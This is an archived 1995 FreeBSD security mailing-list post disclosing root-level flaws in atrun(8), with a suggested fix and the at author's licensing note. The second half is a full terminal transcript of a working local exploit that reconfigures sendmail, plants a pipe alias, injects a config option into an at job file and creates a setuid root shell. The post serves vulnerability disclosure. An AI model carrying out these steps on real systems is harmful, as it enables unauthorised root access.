From owner-freebsd-security Tue Apr 4 06:27:58 1995 Return-Path: security-owner Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id GAA12441 for security-outgoing; Tue, 4 Apr 1995 06:27:58 -0700 Received: from taurus.math.tau.ac.il (taurus.math.tau.ac.il [132.67.64.4]) by freefall.cdrom.com (8.6.10/8.6.6) with ESMTP id GAA12363 for ; Tue, 4 Apr 1995 06:23:02 -0700 Received: from lune.math.tau.ac.il (adam@lune.math.tau.ac.il [132.67.96.11]) by taurus.math.tau.ac.il (8.6.10/8.6.10) with ESMTP id PAA28587 for ; Tue, 4 Apr 1995 15:20:46 +0200 From: adam Received: (adam@localhost) by lune.math.tau.ac.il (8.6.9/8.6.9) id QAA09588 for freebsd-security@FreeBSD.org; Tue, 4 Apr 1995 16:20:44 +0300 Message-Id: <199504041320.QAA09588@lune.math.tau.ac.il> Subject: atrun hole To: freebsd-security@FreeBSD.org Date: Tue, 4 Apr 1995 16:20:44 +0300 (GMT+0300) X-Sender: adam@math.tau.ac.il X-Organization: DIS WHEEL SHALL EXPL0DEX-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 3951 Sender: security-owner@FreeBSD.org Precedence: bulk There are some security problems in the FreeBSD atrun(8) system, one of which allows root access to be obtained easily. First, before running a job, atrun takes an 8 character string from the at job file, assumes it is the login of someone to mail, and passess it to sendmail without any checks. The code says that atrun is run setuid root, and therefore it tries to remain secure by using a scheme which revokes privileges based on changing the real and effective uids of the process. Note, *uids*. However, since (both according to the man page, and the way FreeBSD comes set up) atrun is not setuid root, but executed from /etc/crontab -- it is really run by the root uid. This means that no matter what atrun does, it executes sendmail as root, and there's the hole, which allows root to be broken. An exploit for this problem is included below. The second problem is that atrun only calls setgid() and setuid() to reduce privileges, and doesn't call initgroups(). This leaves jobs run by atrun being in every group root is in. The author of the program, Thomas Koenig , has released a better version of the system, at-2.7a, for Linux. It fixes all of these problems. Therefore, as an immediate fix, I suggest obtaining and installing that version, though I'm unsure of how smoothly it will go, considering it's a Linux program. ftp://sunsite.unc.edu/pub/Linux/system/Daemons/at-2.7a.tgz He writes -- ``If it's ok by the FreeBSD people, I'll put out version 2.8 (which checks for the presence of a '-' in the name to be mailed to, and then doesn't invoke the mailer) up with a BSD copyright again, but that'll take a bit of time.'' And, later -- Subject: Re: atrun hole To: adam@math.tau.ac.il (adam) Date: Tue, 4 Apr 1995 01:20:36 +0200 (MET DST) In-Reply-To: <199503311834.UAA29332@lune.math.tau.ac.il> from "adam" at Mar 31, 95 08:34:34 pm From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas Koenig) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 324 An additional thought... If there's any problem because of the GPL copyright on at 2.7a, I, with this mail, give the *BSD maintainers permission to put it under the same BSD-style license which I've slapped on 2.5 or whatever old version it was I sent them. Please feel free to forward this as appropriate. Thomas Koenig === The following works provided the at jobs directory (/var/at/jobs) is accessible to users. It is with FreeBSD. It is set to mode 0700 with at-2.7a. 5:53pm [eden:~] % whoami adam 5:53pm [eden:~] % cd /tmp 5:53pm [eden:/tmp] % sed -e 's/Og1/Og0/' -e 's/Ou1/Ou0/' -e 's/etc\/aliases/tmp\/aliases/' /etc/sendmail.cf > c 5:54pm [eden:/tmp] % cat > aliases postmaster: "|/tmp/rootme" root: "|/tmp/rootme" adam: "|/tmp/rootme" ^D 5:55pm [eden:/tmp] % /usr/sbin/sendmail -bi -oA/tmp/aliases -oQ/tmp /tmp/aliases: 3 aliases, longest 14 bytes, 60 bytes total 5:55pm [eden:/tmp] % cat > rootme #!/bin/sh /bin/cp /bin/sh /tmp/sh /bin/chmod 6777 /tmp/sh ^D 5:55pm [eden:/tmp] % chmod 755 rootme 5:56pm [eden:/tmp] % at now + 1 min fooz ^D Job a00ca9a79.000 will be executed using /bin/sh 5:56pm [eden:/tmp] % joe /var/at/jobs/a00ca9a79.000 5:56pm [eden:/tmp] % cat /var/at/jobs/a00ca9a79.000 #! /bin/sh # mail -C/tmp/c 1 umask 22 HOME=\/home\/adam; export HOME SHELL=\/usr\/local\/bin\/tcsh; export SHELL LOGNAME=adam; export LOGNAME USER=adam; export USER PATH=\/home\/adam\/bin\:\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin\:\/usr\/local\:\/usr\/local\/bin; export PATH HOSTTYPE=FreeBSD; export HOSTTYPE VENDOR=intel; export VENDOR OSTYPE=FreeBSD; export OSTYPE MACHTYPE=i386; export MACHTYPE SHLVL=1; export SHLVL PWD=\/tmp; export PWD HOST=eden; export HOST PAGER=less; export PAGER VISUAL=joe; export VISUAL MANPATH=\/usr\/share\/man\:\/usr\/local\/man\:\/usr\/man\:\/home\/adam\/man; export MANPATH cd /tmp fooz 5:56pm [eden:/tmp] % sleep 240 DING! [eden:/tmp] % /tmp/sh # whoami root